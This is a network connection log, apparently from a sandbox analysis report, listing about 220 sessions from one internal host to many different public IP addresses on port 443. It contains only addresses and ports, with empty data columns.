                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24159192.168.2.2359340176.229.107.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24160192.168.2.2350626222.248.39.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24161192.168.2.233441423.18.205.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24162192.168.2.2352094106.117.152.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24163192.168.2.23511165.49.34.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24164192.168.2.2359586129.162.235.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24165192.168.2.2339710187.70.152.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24166192.168.2.2359890201.167.220.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24167192.168.2.2345180159.229.5.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24168192.168.2.233823248.237.20.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24169192.168.2.2333970213.97.234.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24170192.168.2.2350874148.10.190.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24171192.168.2.2355524188.179.101.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24172192.168.2.234106077.65.212.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24173192.168.2.234713285.42.166.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24174192.168.2.2356984137.85.138.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24175192.168.2.235419481.34.181.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24176192.168.2.234870877.145.74.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24177192.168.2.2358692150.203.187.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24178192.168.2.2333936177.153.231.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24179192.168.2.2357294223.34.136.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24180192.168.2.235404049.109.105.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24181192.168.2.234388683.170.75.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24182192.168.2.235690246.80.235.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24183192.168.2.233296848.168.53.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24184192.168.2.2351684106.78.129.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24185192.168.2.234172224.101.141.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24186192.168.2.2347094152.141.165.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24187192.168.2.235220477.244.166.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24188192.168.2.2358252198.85.225.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24189192.168.2.2357174125.242.120.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24190192.168.2.2358288162.234.126.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24191192.168.2.2334970135.249.77.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24192192.168.2.2335806145.134.114.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24193192.168.2.233605042.19.221.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24194192.168.2.234709023.0.83.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24195192.168.2.2348964222.191.202.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24196192.168.2.2341690179.181.250.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24197192.168.2.2341304161.18.34.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24198192.168.2.2348732137.196.102.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24199192.168.2.233825476.30.108.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24200192.168.2.234831240.219.120.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24201192.168.2.234597037.137.156.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24202192.168.2.233749663.163.240.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24203192.168.2.235647298.234.233.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24204192.168.2.2353624130.37.79.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24205192.168.2.233543276.183.86.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24206192.168.2.2339474175.102.218.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24207192.168.2.233370048.160.164.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24208192.168.2.2345054110.129.131.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24209192.168.2.2351138163.229.239.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24210192.168.2.234373619.175.202.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24211192.168.2.234014649.237.43.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24212192.168.2.2336372174.108.152.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24213192.168.2.2346222144.55.245.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24214192.168.2.2350152154.99.176.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24215192.168.2.2336274128.123.72.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24216192.168.2.234975832.155.177.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24217192.168.2.2342730110.79.183.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24218192.168.2.2340418173.146.24.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24219192.168.2.234948664.61.127.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24220192.168.2.2358028198.23.37.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24221192.168.2.234153869.14.234.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24222192.168.2.233999287.100.19.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24223192.168.2.234262284.85.158.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24224192.168.2.2358060151.206.100.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24225192.168.2.2333304117.232.249.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24226192.168.2.2336512216.61.221.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24227192.168.2.2335224145.178.213.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24228192.168.2.2346534115.117.127.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24229192.168.2.2333774184.215.155.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24230192.168.2.2334686212.246.6.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24231192.168.2.2345250113.67.252.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24232192.168.2.2358804208.255.199.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24233192.168.2.233800492.127.55.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24234192.168.2.2356900166.7.154.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24235192.168.2.2340610165.184.160.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24236192.168.2.2357488171.29.181.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24237192.168.2.233721436.55.130.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24238192.168.2.2342334155.153.16.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24239192.168.2.2351686120.9.202.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24240192.168.2.2336390126.237.85.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24241192.168.2.2354594112.255.194.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24242192.168.2.2360012106.188.50.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24243192.168.2.235831814.161.255.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24244192.168.2.2347206173.125.90.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24245192.168.2.2360266119.190.42.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24246192.168.2.234502269.99.169.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24247192.168.2.236064661.94.63.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24248192.168.2.2334408219.75.89.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24249192.168.2.2353242167.82.152.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24250192.168.2.2346434192.72.237.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24251192.168.2.233951088.48.142.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24252192.168.2.234586441.233.125.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24253192.168.2.2347194117.200.232.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24254192.168.2.2335790185.66.214.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24255192.168.2.234898824.68.1.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24256192.168.2.2338908108.24.71.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24257192.168.2.2352014203.209.90.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24258192.168.2.234683031.252.155.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24259192.168.2.235428013.124.62.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24260192.168.2.2348904190.240.158.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24261192.168.2.2333548122.160.176.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24262192.168.2.234858457.153.123.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24263192.168.2.2358002201.75.122.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24264192.168.2.236084269.28.223.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24265192.168.2.2352032150.213.168.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24266192.168.2.233970441.235.228.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24267192.168.2.2335164110.28.231.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24268192.168.2.2359158180.241.63.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24269192.168.2.235197661.54.21.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24270192.168.2.2338352134.164.45.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24271192.168.2.2354996124.16.218.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24272192.168.2.2336178145.13.193.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24273192.168.2.2347262168.1.21.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24274192.168.2.234956095.84.38.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24275192.168.2.2359314108.189.41.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24276192.168.2.2336868131.105.82.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24277192.168.2.2340112139.96.218.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24278192.168.2.2350480155.0.125.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24279192.168.2.2342106106.136.57.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24280192.168.2.2344494110.213.113.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24281192.168.2.2353246180.120.35.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24282192.168.2.235312492.162.197.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24283192.168.2.2359490133.104.131.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24284192.168.2.234738470.29.30.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24285192.168.2.2335602157.95.105.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24286192.168.2.233602662.15.29.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24287192.168.2.234029087.126.137.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24288192.168.2.234392072.31.210.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24289192.168.2.2346956190.22.147.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24290192.168.2.2340702145.177.99.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24291192.168.2.2340302144.92.39.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24292192.168.2.2347346153.37.142.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24293192.168.2.234451250.122.201.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24294192.168.2.2341102144.23.175.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24295192.168.2.2346776116.72.144.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24296192.168.2.233941419.66.194.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24297192.168.2.2348064128.42.159.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24298192.168.2.234258481.18.253.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24299192.168.2.2359426111.183.166.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24300192.168.2.2346194108.104.200.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24301192.168.2.2340582168.210.100.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24302192.168.2.2354406141.37.216.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24303192.168.2.2360166206.205.210.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24304192.168.2.2348552111.16.131.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24305192.168.2.235145897.230.38.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24306192.168.2.234152018.118.161.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24307192.168.2.2359386140.3.14.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24308192.168.2.2354084167.199.89.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24309192.168.2.235025290.9.47.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24310192.168.2.2353360145.47.215.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24311192.168.2.2359810148.16.180.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24312192.168.2.233333082.192.232.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24313192.168.2.2355470187.243.232.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24314192.168.2.2353748160.94.98.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24315192.168.2.233422868.192.196.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24316192.168.2.2357512153.14.248.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24317192.168.2.236073095.181.142.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24318192.168.2.234252698.193.70.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24319192.168.2.235910227.219.118.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24320192.168.2.23408224.197.104.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24321192.168.2.2336646158.212.87.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24322192.168.2.2336278110.94.227.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24323192.168.2.235257862.151.40.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24324192.168.2.235639679.120.103.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24325192.168.2.235939876.33.69.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24326192.168.2.234092685.141.203.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24327192.168.2.2333614160.112.95.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24328192.168.2.234231436.245.22.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24329192.168.2.2341758131.43.182.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24330192.168.2.234989866.71.80.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24331192.168.2.2349386195.163.167.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24332192.168.2.2349470189.221.49.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24333192.168.2.2336654129.224.142.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24334192.168.2.234261238.12.102.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24335192.168.2.234288475.92.192.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24336192.168.2.234018036.63.34.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24337192.168.2.236000291.190.31.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24338192.168.2.235315072.2.11.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24339192.168.2.2350306182.125.36.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24340192.168.2.23439142.116.80.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24341192.168.2.234620820.46.127.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24342192.168.2.235664475.92.16.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24343192.168.2.236031281.179.109.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24344192.168.2.2349350113.138.11.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24345192.168.2.236093282.218.115.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24346192.168.2.236097282.75.110.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24347192.168.2.2345366196.82.138.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24348192.168.2.2357882149.94.167.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24349192.168.2.233846635.91.213.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24350192.168.2.2339956196.102.176.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24351192.168.2.234866643.173.195.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24352192.168.2.233740440.142.231.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24353192.168.2.2360594153.246.137.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24354192.168.2.235177676.168.3.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24355192.168.2.2350876189.41.60.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24356192.168.2.2338060198.188.218.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24357192.168.2.235101284.24.199.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24358192.168.2.2360910103.103.146.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24359192.168.2.234719897.138.46.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24360192.168.2.23580825.119.189.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24361192.168.2.2338662210.182.164.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24362192.168.2.2344320190.147.123.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24363192.168.2.234943653.151.122.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24364192.168.2.2333704134.75.203.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24365192.168.2.234436893.62.231.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24366192.168.2.234576642.128.27.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24367192.168.2.2342268190.71.248.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24368192.168.2.2352174137.96.36.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24369192.168.2.2337450207.2.107.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24370192.168.2.235775627.23.16.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24371192.168.2.2342420220.242.21.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24372192.168.2.2336638106.141.82.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24373192.168.2.234296040.2.33.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24374192.168.2.2355680194.154.164.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24375192.168.2.2359298153.157.232.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24376192.168.2.235842672.106.211.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24377192.168.2.235566636.199.190.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24378192.168.2.2359856123.36.197.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24379192.168.2.235948424.52.67.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24380192.168.2.233901895.154.29.153443
